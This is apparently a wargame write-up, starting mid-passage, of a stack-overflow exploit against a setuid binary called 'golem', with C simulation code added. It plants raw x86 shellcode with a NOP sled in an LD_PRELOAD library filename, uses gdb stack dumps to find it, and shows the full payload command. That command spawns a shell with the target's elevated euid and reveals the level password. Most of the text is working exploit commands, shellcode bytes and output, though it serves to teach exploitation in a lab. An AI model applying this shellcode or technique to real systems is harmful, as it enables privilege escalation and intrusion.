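static uint32_t fpo_sim(const uint8_t *src, size_t srclen) {
    uint32_t esp, ebp;
    size_t i;
    reset_frames();
    /* strncpy always writes all 41 bytes: the 41st is src[40] or a NUL pad,
     * so the low byte of the saved ebp is overwritten on every call. */
    for (i = 0; i < 41; i++)
        mem[BUF_ADDR - MODEL_BASE + i] = i < srclen ? src[i] : 0;

    ebp = PC_EBP;
    esp = ebp; ebp = rd32(esp); esp += 4;  /* problem_child: leave (ebp now forged) */
    esp += 4;                              /* problem_child: ret pops 0x0804849e    */
    if (!in_model(ebp)) return 0;
    esp = ebp; ebp = rd32(esp); esp += 4;  /* main: leave, esp = forged ebp + 4     */
    return rd32(esp);                      /* main: ret pops from there             */
}

/* The writeup's payload: ten copies of the shellcode address, then the byte
 * that replaces the low byte of the sfp. */
static size_t build_fpo_payload(uint8_t *out, uint32_t target, uint8_t low_byte) {
    int i;
    for (i = 0; i < 10; i++) {
        out[4 * i]     = (uint8_t)target;
        out[4 * i + 1] = (uint8_t)(target >> 8);
        out[4 * i + 2] = (uint8_t)(target >> 16);
        out[4 * i + 3] = (uint8_t)(target >> 24);
    }
    out[40] = low_byte;
    return 41;
}

int main(void) {
    uint8_t payload[41], as[40];
    memset(as, 'A', sizeof as);
    printf("\"A\"x40       -> main returns to %08x\n", (unsigned)fpo_sim(as, sizeof as));
    build_fpo_payload(payload, 0xbffffdd1u, 0xa4);
    printf("addr x10, a4 -> main returns to %08x\n", (unsigned)fpo_sim(payload, sizeof payload));
    build_fpo_payload(payload, 0xbffffdd1u, 0x84);
    printf("addr x10, 84 -> main returns to %08x\n", (unsigned)fpo_sim(payload, sizeof payload));
    return 0;
}
```

Running it shows the three outcomes worth knowing: 40 'A's zero the low byte and send main's ret to 0xbffff904, outside the modelled frames (a crash in practice), while 0xa4 and 0x84 both land inside the run of copied addresses and make main return to 0xbffffdd1.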


Posted by windowhan

The hint I got was to use LD_PRELOAD.


LD_PRELOAD is an environment variable naming shared libraries that the dynamic linker loads before all others.

So the library at that path is mapped first, and the dynamic linker leaves its path string low on the stack, well below the program's own frames. That matters here because golem's main zeroes the stack from buffer all the way up to the top after the strcpy (the two memset calls in the disassembly below), so anything planted in argv or the environment is gone by the time main returns.

LD_PRELOAD is normally used to hook functions of the program being run; here it is used only to leave a filename, and with it shellcode, on the stack.


[skeleton@localhost tmp]$ vi `perl -e 'print "A"x100,".c"'`

[skeleton@localhost tmp]$ gcc -o `perl -e 'print "A"x100,".so"'` `perl -e 'print "A"x100,".c"'` -fPIC -shared

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "A"x100,".so"'`

0xbffff5c0:     0x00000002      0x40023fd0      0x00000000      0x00000000
0xbffff5d0:     0x40013868      0x40000814      0x400041b0      0x00000001
0xbffff5e0:     0xbffff5ec      0x40001528      0x000002c8      0x00000000
0xbffff5f0:     0x080482d0      0x00000000      0x00000001      0x40000824
0xbffff600:     0xbffff60c      0x400075bb      0x40017000      0x00002fb2
0xbffff610:     0x40013868      0xbffff7c4      0x4000380e      0x40014450
0xbffff620:     0x6d6f682f      0x6b732f65      0x74656c65      0x742f6e6f
0xbffff630:     0x412f706d      0x41414141      0x41414141      0x41414141
0xbffff640:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff650:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff660:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff670:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff680:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff690:     0x41414141      0x2e414141      0x40006f73      0x40013868
0xbffff6a0:     0x4000220c      0xbffffbc7      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x40014a00      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff710:     0xbffff61c      0x00060000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000001      0x00000000      0x00000000


Even after everything above has been wiped, this survives.


[skeleton@localhost tmp]$ gcc -o `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'` `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'` -fPIC -shared

[skeleton@localhost tmp]$ vi `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'`

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'`

[skeleton@localhost tmp]$ gdb -q ./golem
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %esp,%ebp
0x8048473 <main+3>:     sub    $0x2c,%esp
0x8048476 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   $0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    $0x4,%esp
0x8048489 <main+25>:    push   $0x0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    $0x4,%esp
0x8048493 <main+35>:    mov    0xc(%ebp),%eax
0x8048496 <main+38>:    add    $0x4,%eax
0x8048499 <main+41>:    mov    (%eax),%edx
0x804849b <main+43>:    add    $0x2f,%edx
0x804849e <main+46>:    cmpb   $0xbf,(%edx)
0x80484a1 <main+49>:    je     0x80484c0 <main+80>
0x80484a3 <main+51>:    push   $0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    $0x4,%esp
0x80484b0 <main+64>:    push   $0x0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    $0x4,%esp
0x80484ba <main+74>:    lea    0x0(%esi),%esi
0x80484c0 <main+80>:    mov    0xc(%ebp),%eax
0x80484c3 <main+83>:    add    $0x4,%eax
0x80484c6 <main+86>:    mov    (%eax),%edx
0x80484c8 <main+88>:    push   %edx
0x80484c9 <main+89>:    lea    0xffffffd8(%ebp),%eax
0x80484cc <main+92>:    push   %eax
0x80484cd <main+93>:    call   0x80483a8 <strcpy>
0x80484d2 <main+98>:    add    $0x8,%esp
0x80484d5 <main+101>:   lea    0xffffffd8(%ebp),%eax
0x80484d8 <main+104>:   push   %eax
0x80484d9 <main+105>:   push   $0x8048599
0x80484de <main+110>:   call   0x8048378 <printf>
0x80484e3 <main+115>:   add    $0x8,%esp
0x80484e6 <main+118>:   push   $0x2c
0x80484e8 <main+120>:   push   $0x0
0x80484ea <main+122>:   lea    0xffffffd8(%ebp),%eax
0x80484ed <main+125>:   push   %eax
0x80484ee <main+126>:   call   0x8048398 <memset>
0x80484f3 <main+131>:   add    $0xc,%esp
0x80484f6 <main+134>:   lea    0xffffffd8(%ebp),%eax
0x80484f9 <main+137>:   mov    $0xbfffffcf,%edx
0x80484fe <main+142>:   mov    %edx,%ecx
0x8048500 <main+144>:   sub    %eax,%ecx
0x8048502 <main+146>:   mov    %ecx,%eax
0x8048504 <main+148>:   push   %eax
0x8048505 <main+149>:   push   $0x0
0x8048507 <main+151>:   lea    0xffffffd8(%ebp),%eax
0x804850a <main+154>:   lea    0x30(%eax),%edx
0x804850d <main+157>:   push   %edx
0x804850e <main+158>:   call   0x8048398 <memset>
0x8048513 <main+163>:   add    $0xc,%esp
0x8048516 <main+166>:   leave
0x8048517 <main+167>:   ret
0x8048518 <main+168>:   nop
0x8048519 <main+169>:   nop
0x804851a <main+170>:   nop
0x804851b <main+171>:   nop
0x804851c <main+172>:   nop
0x804851d <main+173>:   nop
0x804851e <main+174>:   nop
0x804851f <main+175>:   nop
End of assembler dump.
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbffff000
0xbffff000:     0x00000583      0x000006de      0x00000432      0x0000013f
0xbffff010:     0x0000016e      0x000002f1      0x00000000      0x00000420
0xbffff020:     0x000006c0      0x0000052e      0x0000046c      0x00000000
0xbffff030:     0x000004cd      0x00000660      0x00000000      0x000001af
0xbffff040:     0x0000048a      0x4002bb0e      0xbffff118      0x400081e6
0xbffff050:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff060:     0x0000598c      0x00000259      0x00000000      0x00000591
0xbffff070:     0x000006ea      0x000006ec      0x0000028f      0x000005bb
0xbffff080:     0x000006ce      0x00005450      0x000003c7      0x000006c2
0xbffff090:     0x00000000      0x0000070b      0x400221c0      0x00000545
0xbffff0a0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff0b0:     0x40014ba0      0x00000002      0xbffff0d0      0x400221c0
0xbffff0c0:     0x40014b34      0x03c40f19      0xbffff14c      0x4002995c
0xbffff0d0:     0x400221c0      0x40014930      0x4002bad5      0x4002bad5
0xbffff0e0:     0x40013868      0x40014930      0x0000590a      0x0000065b
0xbffff0f0:     0x00000561      0x000005cc      0x00000000      0x40001402
0xbffff100:     0xbffff1d0      0x40008134      0x40000c7d      0x40024f23
0xbffff110:     0x40013868      0x40014930      0x00000f53      0x4000a7fd
0xbffff120:     0x40014920      0x40014c58      0x00000007      0x4000a74e
0xbffff130:     0x4010a1ec      0xbffff1d1      0x00000000      0x00000180
0xbffff140:     0x400221c0      0x4010a710      0x00000000      0x400221c0
0xbffff150:     0x40000474      0x00000000      0x40000824      0x400002f4
0xbffff160:     0x40013c00      0x00000004      0x40014ba0      0x00000004
0xbffff170:     0xbffff188      0x4001dd60      0x40014b3c      0x056e90c5
0xbffff180:     0xbffff204      0x40024f23      0x4001dd60      0x40014930
0xbffff190:     0x000000bd      0x4002bb0e      0xbffff268      0x400081e6
0xbffff1a0:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff1b0:     0x0000187f      0x00000001      0x4001fe70      0x00000310
0xbffff1c0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff1d0:     0xbffff208      0x4000a7fd      0x40014920      0x40014c58
0xbffff1e0:     0x40001402      0xbffff2b4      0x40008134      0x40000ec9
0xbffff1f0:     0x40025713      0x40013868      0x40014930      0x00001743
0xbffff200:     0x40024f23      0x4001dd60      0xbffff248      0x4000a970
0xbffff210:     0x40017000      0x40108980      0x400c0b00      0x00000000
0xbffff220:     0x40000ec9      0x400707e4      0x00000001      0x00000000
0xbffff230:     0x00000031      0x40000664      0x00000000      0x40000824
0xbffff240:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff250:     0x00000004      0xbffff26c      0x4001e4f0      0x40014b3c
0xbffff260:     0x00dc28f5      0xbffff2e8      0x40025713      0x4001e4f0
0xbffff270:     0x40014930      0x40108980      0x40017000      0x00000031
0xbffff280:     0x4010a1ec      0x40108980      0xbffff2a8      0x4006fa3e
0xbffff290:     0x40108980      0x40017000      0x00000031      0x4010a1ec
0xbffff2a0:     0x00000001      0x40108980      0xbffff2bc      0x400711c7
0xbffff2b0:     0x40108980      0xbffff2ec      0x4000a7fd      0x40014920
0xbffff2c0:     0x40014c58      0x00000007      0x4000a74e      0x4010a1ec
0xbffff2d0:     0x0804859c      0x00000001      0x40014930      0x4001e4f0
0xbffff2e0:     0x4010a320      0x40025713      0x4001e4f0      0xbffff9a4
0xbffff2f0:     0x4000a970      0x40108980      0x00000400      0x4006c2e4
0xbffff300:     0x40014930      0xbffff9a4      0x4006428b      0x40108980
0xbffff310:     0x4010a1ec      0x4000ae60      0xbffffa44      0x00000000
0xbffff320:     0x0000675b      0x000081a4      0x00000001      0x00000000
0xbffff330:     0x00000000      0x00000808      0x00000000      0x00000000
0xbffff340:     0x00008561      0x000081ed      0x00000001      0x00000000
0xbffff350:     0x40001402      0xbffff424      0x400081e6      0x400013e1
0xbffff360:     0x400013e1      0x40013868      0x400013a5      0x40000824
0xbffff370:     0x400013d3      0x40013c00      0x40014b90      0x0000000e
0xbffff380:     0x40013e80      0x0804859c      0x250014c4      0x00000000
0xbffff390:     0x00000001      0x4002bad5      0x40001353      0x00000000
0xbffff3a0:     0xbffff428      0x40000814      0x00000052      0x40000824
0xbffff3b0:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff3c0:     0x00000003      0xbffff3dc      0x40000814      0x400140d4
0xbffff3d0:     0x0b725f23      0xbffff4b8      0x400013a5      0x40000814
0xbffff3e0:     0x40013c00      0x400002f4      0x40013c00      0x00000000
0xbffff3f0:     0x00000000      0x00000004      0x40014ba0      0x00000004
0xbffff400:     0xbffff420      0x40000674      0x400140d8      0x01ee5739
0xbffff410:     0xbffff4b8      0x40000edc      0x40013868      0x40013c00
0xbffff420:     0x00000000      0xbffff4e8      0x4000966a      0x080480f4
0xbffff430:     0x40014cf8      0x00000007      0x40013868      0x00000000
0xbffff440:     0x40013e70      0x40000814      0x40009c50      0x00005207
0xbffff450:     0x4001a0dc      0x4001a0dc      0x4001a0e8      0x00000018
0xbffff460:     0x400017f4      0x00000004      0x4001a0e8      0x40013c00
0xbffff470:     0xbffff4d0      0x2073f4cc      0xffffffff      0xffffffd0
0xbffff480:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff490:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff4a0:     0xbffff9d0      0x00000002      0x40023fd0      0x40013c00
0xbffff4b0:     0x4000ba15      0x00000000      0x00000000      0x00000001
0xbffff4c0:     0xbffff9c8      0xbffff9a3      0x0804859b      0x08048599
0xbffff4d0:     0x00000031      0xffffffff      0x00000000      0x00000001
0xbffff4e0:     0x40000824      0xbffff4f0      0x400075bb      0x40017000
0xbffff4f0:     0x00002fb2      0x40013868      0xbffff734      0x4000380e
0xbffff500:     0x400144d8      0x6d6f682f      0x6b732f65      0x74656c65
0xbffff510:     0x742f6e6f      0x902f706d      0x90909090      0x90909090
0xbffff520:     0x90909090      0x0804859c      0x90909090      0x90909090
0xbffff530:     0x90909090      0x90909090      0x00000000      0x00000000
0xbffff540:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff550:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff560:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff570:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff580:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff590:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5d0:     0x90909090      0x90909090      0x90909090      0x68909090
0xbffff5e0:     0x81cee28a      0x530cb168      0x6f6a6854      0x0168e48a
0xbffff5f0:     0x68633069      0x69743069      0xfe59146a      0x79490c0c
0xbffff600:     0xe1f741fa      0x732ec354      0x4000006f      0x40013868
0xbffff610:     0x4000220c      0xbffffb3c      0x00000000      0x00000000
0xbffff620:     0x00000000      0x00000000      0x40014b00      0x00000000
0xbffff630:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff640:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff650:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff660:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff670:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff680:     0xbffff500      0x00060000      0x00000000      0x00000000
0xbffff690:     0x00000000      0x00000001      0x00000000      0x00000000
0xbffff6a0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff710:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000000      0x4000f7cb      0x4000f7cb
0xbffff730:     0x40013868      0xbffff778      0x4000c84c      0x08048034
0xbffff740:     0x00000006      0xbffff774      0x40013868      0xbffff9a8
0xbffff750:     0x40013da0      0x0001fbf1      0xbffffa50      0x000001fe
0xbffff760:     0x000001fe      0x000001fe      0x000001fe      0x00000006
0xbffff770:     0x08048034      0x080483c0      0xbffff79c      0x40002179
0xbffff780:     0xbffffa40      0x4000220c      0x080483c0      0x40013868
0xbffff790:     0x00000000      0xbffff7f8      0xbffff788      0xbffffa34
0xbffff7a0:     0x400020ea      0xbffffa40      0xbffff808      0x00000000


[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\xbf"x44,"\x70\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿poy¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$
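The wipe, and why the preload path escapes it, as an added example that is not part of the original post. It replays the two memset() calls from golem's disassembly on a modelled stack: the LD_PRELOAD path is planted where the dump shows it (0xbffff504), the same bytes are planted in the environment area above buffer, and after the wipe only the lower copy still has its NOP sled. The buffer address (0xbffff9a0) and the environment address (0xbffffc00) are assumptions, not values from the page. One caveat the dump itself shows: the first stretch of the real sled had already been clobbered by later stack frames (0x0804859c at 0xbffff524, zeros at 0xbffff538), which is why the return address above lands further in, at 0xbffff570.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Modelled stack 0xbffff400..0xbfffffff, addresses as in the dump above. */
#define MODEL_BASE 0xbffff400u
#define MODEL_TOP  0xc0000000u
#define WIPE_END   0xbfffffcfu   /* constant hard-coded in golem's main                 */
#define BUF_ADDR   0xbffff9a0u   /* assumed address of main's buffer[40] (not in the dump) */
#define PRELOAD_AT 0xbffff504u   /* where ld.so left the LD_PRELOAD path in the dump    */
#define ENV_AT     0xbffffc00u   /* assumed address of an environment string            */

static uint8_t mem[MODEL_TOP - MODEL_BASE];
static uint8_t *at(uint32_t a) { return mem + (a - MODEL_BASE); }
static uint32_t rd32(uint32_t a) {
    const uint8_t *p = at(a);
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint32_t a, uint32_t v) {
    uint8_t *p = at(a);
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* The two memset() calls from the disassembly:
 *   memset(buffer, 0, 0x2c);  memset(buffer + 0x30, 0, 0xbfffffcf - buffer);
 * Everything from buffer to the top of the stack is zeroed except
 * buffer[44..47], the return address that strcpy just overwrote. */
static void golem_wipe(uint32_t buf) {
    memset(at(buf), 0, 0x2c);
    memset(at(buf + 0x30), 0, WIPE_END - buf);   /* ends at the top of the stack */
}

/* Constructed stand-in for the library name: directory prefix, NOP sled, then
 * two marker bytes where the real shellcode would go. */
static const char kPrefix[] = "/home/skeleton/tmp/";
static size_t make_preload_name(uint8_t *out, size_t nops) {
    size_t n = sizeof kPrefix - 1;
    memcpy(out, kPrefix, n);
    memset(out + n, 0x90, nops);
    memcpy(out + n + nops, "SC", 2);
    return n + nops + 2;
}

/* Copy a string into the model as the kernel or ld.so would, NUL-terminated. */
static void place(uint32_t addr, const uint8_t *s, size_t n) {
    memcpy(at(addr), s, n);
    at(addr)[n] = 0;
}

/* Length of the 0x90 run starting at addr: how much sled survived. */
static size_t nop_run(uint32_t addr) {
    size_t n = 0;
    while (addr + n < MODEL_TOP && *at(addr + (uint32_t)n) == 0x90) n++;
    return n;
}

/* golem's filter is the opposite of bugbear's: argv[1][47] must be 0xbf,
 * so the return address has to be a stack address. */
static int passes_golem_check(uint32_t ret) { return (ret >> 24) == 0xbf; }

int main(void) {
    uint8_t name[256];
    size_t n = make_preload_name(name, 200);
    uint32_t ret = 0xbffff570u;                 /* the writeup's return address   */
    memset(mem, 0, sizeof mem);
    place(PRELOAD_AT, name, n);                 /* ld.so's copy, below buffer     */
    place(ENV_AT, name, n);                     /* same bytes in the environment  */
    wr32(BUF_ADDR + 44, ret);                   /* what strcpy left as main's ret */
    golem_wipe(BUF_ADDR);
    printf("sled below buffer: %zu NOPs left, sled in environment: %zu NOPs left\n",
           nop_run(PRELOAD_AT + 19), nop_run(ENV_AT + 19));
    printf("ret still %08x, argv[1][47] check: %s\n", (unsigned)rd32(BUF_ADDR + 44),
           passes_golem_check(ret) ? "passes" : "stack betrayed you!!");
    return 0;
}
```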


Posted by windowhan